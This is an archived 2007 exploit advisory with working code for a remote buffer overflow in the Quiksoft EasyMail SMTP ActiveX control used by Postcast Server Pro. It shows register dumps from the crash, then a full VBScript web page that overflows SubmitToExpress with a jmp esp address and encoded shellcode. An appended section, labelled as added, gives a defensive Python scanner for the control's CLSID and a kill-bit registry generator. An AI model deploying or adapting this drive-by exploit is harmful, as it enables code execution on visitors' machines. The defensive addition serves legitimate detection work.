postcast-overflow.txt

28 Aug 2007 | Reported by rgod | Type: packetstorm | Source: packetstormsecurity.com

Postcast Server Pro 3.0.61 Quiksoft EasyMail remote buffer overflow exploit

Code
`<!-- Postcast Server Pro 3.0.61 / Quiksoft EasyMail SMTP Object (emsmtp.dll 6.0.1)  
remote buffer overflow exploit  
(ie6 / xp sp2 version)  
  
passing more than 539 chars to SubmitToExpress method:  
  
EAX 00000400  
ECX 0013DD24 ASCII "Error Creating File: AAAA ...  
EDX C0403FFF  
EBX FFFFFFFF  
ESP 0013D5E4  
EBP 0013DD08  
ESI 41414141  
EDI 0013DD24 ASCII "Error Creating File: AAAA ...  
EIP 06986256 emsmtp.06986256  
  
...  
CMP DWORD PTR DS:[ESI+180],1  
Access violation when reading 414142C1  
  
seh overwrite follows:  
  
EAX 00000000  
ECX 41414141  
EDX 7C9137D8 ntdll.7C9137D8  
EBX 00000000  
ESP 0013D214  
EBP 0013D234  
ESI 00000000  
EDI 00000000  
EIP 41414141  
  
and if we pass a readable address to ESI:  
  
A*539 + esi + A*99999  
  
we fall in a more convenient  
situation:  
  
EAX 00000000  
ECX 0013DF7C ASCII "AAAA...  
EDX 001835D0  
EBX 00000000  
ESP 0013DF68 ASCII "AAAA...  
EBP 41414141  
ESI 05542A08  
EDI 05586250 ASCII "AAAA...  
EIP 41414141  
  
Object safety report:  
RegKey Safe for Script: true  
RegKey Safe for Init: true  
  
vendor urls: http://www.postcastserver.com/  
http://www.quicksoftcorp.com/  
  
rgod.  
site: http://retrogod.altervista.org  
-->  
  
  
<html>  
<object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='EasyMailSMTPObj' /></object>  
<script language='vbscript'>  
  
'open calc.exe  
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _  
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _  
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _  
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _  
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _  
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _  
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _  
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _  
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _  
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _  
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _  
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _  
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _  
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _  
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _  
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _  
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _  
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _  
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _  
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _  
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _  
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")  
  
  
esi = unescape("%01%01%01%01")  
ebp = "bbbb"  
nop = string(16,unescape("%90"))  
eip = unescape("%78%2c%41%7e") '0x7E412C78 jmp esp user32.dll  
bof = string(539,"A") + esi + ebp + eip + nop + scode  
  
EasyMailSMTPObj.SubmitToExpress bof  
  
</script>  
</html>  
`
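Added example, not part of the original advisory or rgod's code: a defensive static check that flags HTML which instantiates the EasyMail SMTP control by the CLSID above and calls `SubmitToExpress` on it, plus a generator for the Internet Explorer kill-bit entry that stops the browser from loading a control marked safe for scripting. The function names and sample pages are constructed for illustration.

```python
import re

# CLSID and method name are taken from the exploit page above.
EASYMAIL_CLSID = "68AC0D5F-0424-11D5-822F-00C04F6BA8D9"
RISKY_METHOD = "SubmitToExpress"

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
ATTR = re.compile(r"""\b(classid|id)\s*=\s*["']?([^"'\s>]+)""", re.I)

# Constructed sample pages (hypothetical, harmless argument values).
SAMPLE_FLAGGED = (
    "<object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='mailer'>"
    "</object><script language='vbscript'>mailer.SubmitToExpress \"x\"</script>"
)
SAMPLE_BENIGN = (
    "<object classid='clsid:00000000-0000-0000-0000-000000000000' id='other'>"
    "</object>"
)


def scan_html(html):
    """Return sorted findings for one HTML document."""
    findings = set()
    object_ids = []
    for tag in OBJECT_TAG.findall(html):
        attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
        clsid = attrs.get("classid", "").lower().replace("clsid:", "").strip("{}")
        if clsid == EASYMAIL_CLSID.lower():
            findings.add("object-instantiated")
            if "id" in attrs:
                object_ids.append(attrs["id"])
    # A call on the flagged object's id is the path the advisory describes.
    for obj_id in object_ids:
        call = re.compile(re.escape(obj_id) + r"\s*\.\s*" + RISKY_METHOD + r"\b", re.I)
        if call.search(html):
            findings.add("method-called")
    return sorted(findings)


def killbit_reg(clsid=EASYMAIL_CLSID):
    """Build .reg text that sets the IE kill bit (Compatibility Flags 0x400)."""
    key = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
           r"\ActiveX Compatibility\{%s}" % clsid)
    return ("Windows Registry Editor Version 5.00\n\n"
            "[%s]\n\"Compatibility Flags\"=dword:00000400\n" % key)


if __name__ == "__main__":
    print(scan_html(SAMPLE_FLAGGED))
    print(killbit_reg())
```

The scanner only matches literal `<object>` tags and direct calls on the object's `id`; pages that build the tag dynamically need script-aware inspection.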
